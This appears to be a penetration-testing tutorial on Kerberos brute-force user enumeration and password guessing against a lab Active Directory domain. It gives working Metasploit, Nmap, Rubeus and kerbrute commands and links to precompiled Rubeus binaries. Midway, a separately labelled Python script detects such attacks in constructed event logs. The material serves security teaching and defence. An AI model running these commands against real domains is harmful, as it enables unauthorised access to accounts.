Kerberos Brute Force Attack
In the previous article, “Domain Persistence: Golden Ticket Attack”, we explained how to forge a Kerberos ticket, how the Kerberos authentication process works and what its service components are. In this post, we are going to perform a Kerberos brute force attack against port 88, the port used by the Kerberos service, in order to enumerate valid usernames and passwords.
Table of Contents
- Metasploit
- Nmap
- Rubeus
- Kerbrute
Metasploit
This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes the different responses returned by the service for valid and invalid users.
msf > use auxiliary/gather/kerberos_enumusers
msf auxiliary(gather/kerberos_enumusers) > set rhosts 192.168.1.105
msf auxiliary(gather/kerberos_enumusers) > set User_File /root/user.txt
msf auxiliary(gather/kerberos_enumusers) > set Domain ignite.local
msf auxiliary(gather/kerberos_enumusers) > exploit
According to this module, a valid username will either receive a TGT in the AS-REP response or trigger the error KRB5KDC_ERR_PREAUTH_REQUIRED, which tells the client that the user must perform pre-authentication. Either way, the response confirms that the user account exists on the given host, whereas a non-existent user is rejected outright.
As a result, we found three valid users (Yashika, geet, aarti) on the Kerberos service.
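The same server-side distinction the module relies on (an unknown principal is rejected with KDC_ERR_C_PRINCIPAL_UNKNOWN, an existing one is answered with a pre-authentication error or a TGT) is what the domain controller records in its security log, which is where a defender catches this enumeration. The following detection script is an added example and is not part of the article or of the Metasploit module. It assumes a simplified, constructed one-line-per-event rendering of Windows Security events 4768 (TGT requested) and 4771 (pre-authentication failed); a real deployment would read the TargetUserName, IpAddress and Status fields from the EVTX/XML records instead. The event IDs and KDC result codes are the standard ones; the log line format, IP addresses and thresholds are assumptions for the example.

```python
"""Flag Kerberos user-enumeration and password-guessing bursts in KDC audit events.

Added example, not from the article. The input line format below is a constructed,
simplified rendering of Windows Security events 4768/4771; the event IDs and the
hex KDC result codes are the real ones, everything else here is assumed.
"""
from collections import defaultdict
from dataclasses import dataclass
import re

# KDC error codes as they appear in the Status / Result Code field (RFC 4120 numbers).
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6   # principal does not exist in the realm
KDC_ERR_PREAUTH_FAILED = 0x18       # principal exists, wrong password / key
KDC_ERR_PREAUTH_REQUIRED = 0x19     # principal exists, client must pre-authenticate

# Constructed line format: event=<id> ip=<source> user=<name> status=<hex code>
EVENT_RE = re.compile(
    r"event=(?P<event>\d+)\s+ip=(?P<ip>[\d.]+)\s+user=(?P<user>\S+)\s+status=(?P<status>0x[0-9a-fA-F]+)"
)


@dataclass
class KdcEvent:
    event_id: int
    ip: str
    user: str
    status: int


def parse_event(line):
    """Parse one constructed log line; return None for lines that do not match."""
    m = EVENT_RE.search(line)
    if not m:
        return None
    return KdcEvent(int(m.group("event")), m.group("ip"),
                    m.group("user").lower(), int(m.group("status"), 16))


def detect(lines, unknown_threshold=5, preauth_threshold=5):
    """Return {source_ip: [finding, ...]} for sources whose failure pattern looks like a tool.

    user enumeration : one source gets >= unknown_threshold *distinct* usernames rejected
                       with 0x6 in event 4768 (the wordlist walk this article performs).
    password guessing: one source accumulates >= preauth_threshold 0x18 failures in event
                       4771 against accounts that do exist.
    """
    unknown_users = defaultdict(set)
    preauth_fail = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        if ev.event_id == 4768 and ev.status == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown_users[ev.ip].add(ev.user)
        elif ev.event_id == 4771 and ev.status == KDC_ERR_PREAUTH_FAILED:
            preauth_fail[ev.ip].append(ev.user)

    findings = defaultdict(list)
    for ip, users in unknown_users.items():
        if len(users) >= unknown_threshold:
            findings[ip].append(f"user enumeration: {len(users)} distinct unknown principals")
    for ip, attempts in preauth_fail.items():
        if len(attempts) >= preauth_threshold:
            findings[ip].append(
                f"password guessing: {len(attempts)} pre-auth failures over "
                f"{len(set(attempts))} accounts")
    return dict(findings)


# Constructed sample events (not real Windows log output). 10.0.0.7 is a normal
# workstation with one typo; 10.0.0.50 walks a wordlist and then guesses passwords
# for the three accounts the walk confirmed.
SAMPLE_EVENTS = [
    "event=4768 ip=10.0.0.7  user=geet          status=0x0",
    "event=4768 ip=10.0.0.7  user=geeet         status=0x6",
    "event=4768 ip=10.0.0.50 user=admin         status=0x6",
    "event=4768 ip=10.0.0.50 user=administrator status=0x6",
    "event=4768 ip=10.0.0.50 user=backup        status=0x6",
    "event=4768 ip=10.0.0.50 user=test          status=0x6",
    "event=4768 ip=10.0.0.50 user=svc_sql       status=0x6",
    "event=4768 ip=10.0.0.50 user=guest         status=0x6",
    "event=4771 ip=10.0.0.50 user=yashika       status=0x18",
    "event=4771 ip=10.0.0.50 user=geet          status=0x18",
    "event=4771 ip=10.0.0.50 user=aarti         status=0x18",
    "event=4771 ip=10.0.0.50 user=yashika       status=0x18",
    "event=4771 ip=10.0.0.50 user=geet          status=0x18",
    "event=4771 ip=10.0.0.50 user=aarti         status=0x18",
]


def run_sample():
    """Run the detector over the constructed events; only 10.0.0.50 should be flagged."""
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for ip, notes in run_sample().items():
        print(ip)
        for note in notes:
            print("  -", note)
```

The two counters deliberately differ: enumeration is measured in distinct names, because a wordlist walk produces one 0x6 per candidate and almost never repeats a name, while a single user mistyping their own account repeats the same wrong name. Tune the thresholds to the domain's baseline; a handful of 0x6 results per source per hour is normal, hundreds within a minute is not.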
Nmap
The Nmap script krb5-enum-users discovers valid usernames by brute-force querying likely usernames against a Kerberos service. The krb5-enum-users.realm script argument is essential because it supplies the Kerberos realm the script needs in order to form its requests and guess usernames effectively.
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='ignite.local',userdb=/root/user.txt 192.168.1.105
Similarly, Nmap uses the same approach as the Metasploit module to enumerate Kerberos usernames.
Rubeus
Kerberos Brute Force Attack can be executed using Rubeus, a C# toolset for raw Kerberos interaction and abuses. This toolset draws heavily from Benjamin Delpy’s Kekeo project (licensed under CC BY-NC-SA 4.0) and Vincent LE TOUX’s MakeMeEnterpriseAdmin project (licensed under GPL v3.0). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization.
You can download it from here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
Now run the following command, providing a password list along with the domain name.
.\Rubeus.exe brute /passwords:password.txt /WIN-S0V7KMTVLD2.ignite.local /outfile:ignite.txt
/passwords:password.txt: password dictionary
WIN-S0V7KMTVLD2.ignite.local: hostname.domain_name
/outfile:ignite.txt: output file
It enumerates valid username and password combinations by trying each user/password pair in turn.
Kerbrute
Kerbrute is a tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos pre-authentication. Download it from here.
Similarly, kerbrute checks username and password combinations against Kerberos with the help of the following command.
python kerbrute.py -dc-ip 192.168.1.105 -domain ignite.local -users /root/user.txt -passwords /root/pass.txt -outputfile ignite.txt
Conclusion
In conclusion, the Kerberos brute force attack remains a common technique for obtaining user credentials in Active Directory environments. By guessing credentials or cracking Kerberos tickets, attackers can gain unauthorized access to network resources and escalate their privileges. Understanding and defending against this attack is critical for maintaining a secure enterprise environment.
Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn